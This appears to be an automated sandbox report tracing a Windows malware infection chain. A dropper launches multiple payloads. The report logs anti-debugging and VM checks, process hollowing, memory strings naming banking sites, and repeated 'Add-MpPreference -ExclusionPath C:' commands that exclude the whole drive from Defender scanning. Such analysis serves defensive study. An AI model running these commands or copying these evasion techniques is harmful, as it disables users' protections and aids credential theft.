                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.0000000003374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.0000000003374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.0000000003374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.0000000003374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                          Source: svchost.exe, 0000001F.00000002.2474804150.000001DBE2870000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWab@
                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.0000000003374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.0000000003374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                          Source: 13s1HMkHKv.exe, 00000000.00000002.1235622653.0000000000C38000.00000040.00000001.01000000.00000003.sdmp, rapes.exe, 00000003.00000002.1263384694.0000000000418000.00000040.00000001.01000000.0000000A.sdmp, rapes.exe, 00000004.00000002.1267096726.0000000000418000.00000040.00000001.01000000.0000000A.sdmp, rapes.exe, 0000000B.00000002.2466924239.0000000000418000.00000040.00000001.01000000.0000000A.sdmp, s7MG2VL.exe, 0000000C.00000002.2091813340.0000000000813000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.0000000003374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                          Source: eAzoDbY.exe, 00000019.00000003.2214314063.00000000014ED000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2217666270.00000000014F0000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000002.2233380605.00000000014F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp>S
                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.0000000003374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                          Source: svchost.exe, 0000001F.00000002.2476410106.000001DBE28E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeAPI call chain: ExitProcess graph end nodegraph_17-53096
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSystem information queried: ModuleInformationJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeProcess information queried: ProcessInformationJump to behavior

                          Anti Debugging

                          barindex
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeCode function: 0_2_054705C7 Start: 0547066E End: 054705E30_2_054705C7
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 11_2_0536098F Start: 053609A9 End: 053609A311_2_0536098F
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeOpen window title or class name: regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeOpen window title or class name: gbdyllo
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeOpen window title or class name: procmon_window_class
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeOpen window title or class name: ollydbg
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeOpen window title or class name: filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeFile opened: NTICE
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeFile opened: SICE
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeFile opened: SIWVID
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeProcess queried: DebugPort
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeCode function: 0_2_05470A9C rdtsc 0_2_05470A9C
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00BB553B _strlen,GetModuleHandleA,GetProcAddress,VirtualProtect,LdrInitializeThunk,OleDraw,GetModuleHandleA,GetProcAddress,OleDraw,FreeConsole,__fread_nolock,_strlen,_strlen,FreeConsole,__fread_nolock,FreeConsole,__fread_nolock,15_2_00BB553B
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00C1DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00C1DC9E
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 11_2_0024DB60 mov eax, dword ptr fs:[00000030h]11_2_0024DB60
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 11_2_00255FF2 mov eax, dword ptr fs:[00000030h]11_2_00255FF2
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00C461B4 mov edi, dword ptr fs:[00000030h]15_2_00C461B4
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00C2B71C GetProcessHeap,15_2_00C2B71C
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00C1D8E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00C1D8E2
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00C1DC92 SetUnhandledExceptionFilter,15_2_00C1DC92
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00C1DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00C1DC9E
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00C25DCE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00C25DCE
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C1D8E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00C1D8E2
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C1DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00C1DC9E
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C25DCE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00C25DCE

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Source: C:\Windows\System32\svchost.exeFile created: ps.exe.31.drJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:'
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:'
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00C461B4 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,15_2_00C461B4
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeNtProtectVirtualMemory: Direct from: 0x140265290
                          Source: C:\Users\user\AppData\Local\Temp\{ED8B0E24-294A-4924-ABF6-1B4F6433B770}\cls.exeNtProtectVirtualMemory: Direct from: 0x14002F2D3
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeNtProtectVirtualMemory: Direct from: 0x1403E55F6
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeNtProtectVirtualMemory: Direct from: 0x1403D93D1
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeNtProtectVirtualMemory: Direct from: 0x1400026B1
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeNtQuerySystemInformation: Direct from: 0x14025277A
                          Source: C:\Users\user\AppData\Roaming\altuninstall_test\ShortcutTaskAgent.exeNtQuerySystemInformation: Direct from: 0x65007FF3
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeNtProtectVirtualMemory: Direct from: 0x1402569CE
                          Source: C:\Users\user\AppData\Local\Temp\{ED8B0E24-294A-4924-ABF6-1B4F6433B770}\cls.exeNtProtectVirtualMemory: Direct from: 0x14006F6F1
                          Source: C:\Users\user\AppData\Roaming\altuninstall_test\ShortcutTaskAgent.exeNtProtectVirtualMemory: Direct from: 0x6BFDF966
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeNtQuerySystemInformation: Direct from: 0x140246CFC
                          Source: C:\Users\user\AppData\Local\Temp\{ED8B0E24-294A-4924-ABF6-1B4F6433B770}\cls.exeNtProtectVirtualMemory: Direct from: 0x14003552D
                          Source: C:\Users\user\AppData\Local\Temp\{ED8B0E24-294A-4924-ABF6-1B4F6433B770}\cls.exeNtProtectVirtualMemory: Direct from: 0x140052C62
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeNtProtectVirtualMemory: Direct from: 0x1403E27A5
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeNtQuerySystemInformation: Direct from: 0x1403DCCB4
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeNtQuerySystemInformation: Direct from: 0x1403DDA58
                          Source: C:\Users\user\AppData\Local\Temp\{ED8B0E24-294A-4924-ABF6-1B4F6433B770}\cls.exeNtProtectVirtualMemory: Direct from: 0x14003C5FF
                          Source: C:\Users\user\AppData\Local\Temp\{ED8B0E24-294A-4924-ABF6-1B4F6433B770}\cls.exeNtProtectVirtualMemory: Direct from: 0x14003D736
                          Source: C:\Users\user\AppData\Local\Temp\{ED8B0E24-294A-4924-ABF6-1B4F6433B770}\cls.exeNtProtectVirtualMemory: Direct from: 0x1400474E6
                          Source: C:\Users\user\AppData\Local\Temp\{ED8B0E24-294A-4924-ABF6-1B4F6433B770}\cls.exeNtProtectVirtualMemory: Direct from: 0x140076667
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeMemory written: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exe base: 400000 value starts with: 4D5AJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeMemory written: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe base: 400000 value starts with: 4D5A
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeMemory written: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exe base: 400000 value starts with: 4D5A
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeSection loaded: NULL target: C:\Windows\System32\svchost.exe protection: read write
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeSection loaded: NULL target: C:\Windows\System32\svchost.exe protection: execute and read and write
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeSection loaded: NULL target: C:\Windows\System32\svchost.exe protection: read write
                          Source: C:\Users\user\AppData\Roaming\altuninstall_test\ShortcutTaskAgent.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 11_2_00228700 ShellExecuteA,Sleep,CreateThread,Sleep,11_2_00228700
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exe "C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exe "C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe "C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exe "C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exe "C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exe "C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10191490101\EZs3CZC.exe "C:\Users\user\AppData\Local\Temp\10191490101\EZs3CZC.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10192270101\dx3hXS1.exe "C:\Users\user\AppData\Local\Temp\10192270101\dx3hXS1.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeProcess created: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exe "C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeProcess created: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe "C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe"
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeProcess created: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe "C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe"
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeProcess created: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe "C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe"
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:'
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.bat" """
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeProcess created: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exe "C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exe"
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe"
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeProcess created: C:\Users\user\AppData\Local\Temp\file.exe "C:\Users\user\AppData\Local\Temp\file.exe"
                          Source: C:\Users\user\AppData\Local\Temp\file.exeProcess created: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exe "C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exe"
                          Source: C:\Users\user\AppData\Roaming\altuninstall_test\ShortcutTaskAgent.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                          Source: rapes.exe, rapes.exe, 0000000B.00000002.2466924239.0000000000418000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: pProgram Manager
                          Source: s7MG2VL.exe, s7MG2VL.exe, 0000000C.00000002.2091813340.0000000000813000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: ^Program Manager
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 11_2_00249AB5 cpuid 11_2_00249AB5
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: GetLocaleInfoW,15_2_00C2F8B3
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,15_2_00C2F048
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: EnumSystemLocalesW,15_2_00C2B007
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: EnumSystemLocalesW,15_2_00C2F299
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: GetLocaleInfoW,15_2_00C2AB0C
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,15_2_00C2F334
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: GetLocaleInfoW,15_2_00C2F5E6
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: EnumSystemLocalesW,15_2_00C2F587
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: EnumSystemLocalesW,15_2_00C2F6BB
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,15_2_00C2F7AD
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: GetLocaleInfoW,15_2_00C2F706
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: GetLocaleInfoW,17_2_00C2F8B3
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,17_2_00C2F048
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: EnumSystemLocalesW,17_2_00C2B007
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: EnumSystemLocalesW,17_2_00C2F299
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: GetLocaleInfoW,17_2_00C2AB0C
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,17_2_00C2F334
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: GetLocaleInfoW,17_2_00C2F5E6
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: EnumSystemLocalesW,17_2_00C2F587
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: EnumSystemLocalesW,17_2_00C2F6BB
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,17_2_00C2F7AD
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: GetLocaleInfoW,17_2_00C2F706
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10191490101\EZs3CZC.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10191490101\EZs3CZC.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10192270101\dx3hXS1.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10192270101\dx3hXS1.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
